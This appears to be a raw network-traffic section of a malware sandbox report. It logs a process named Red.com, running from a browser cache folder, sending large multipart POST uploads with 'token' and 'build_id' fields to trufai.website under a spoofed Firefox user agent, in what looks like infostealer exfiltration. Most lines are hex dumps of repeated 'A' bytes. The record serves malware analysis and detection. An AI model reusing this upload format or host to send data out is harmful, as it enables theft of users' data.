2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49793	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:57 UTC	282	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58glx4o8qq1dje3ec2n7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 Data Ascii: ------58glx4o8qq1dje3ec2n7Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------58glx4o8qq1dje3ec2n7Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------58glx4o8qq1dje3ec2n7Cont
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49806	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:59 UTC	283	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----pzuk6x4ohvs2va1no8gl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
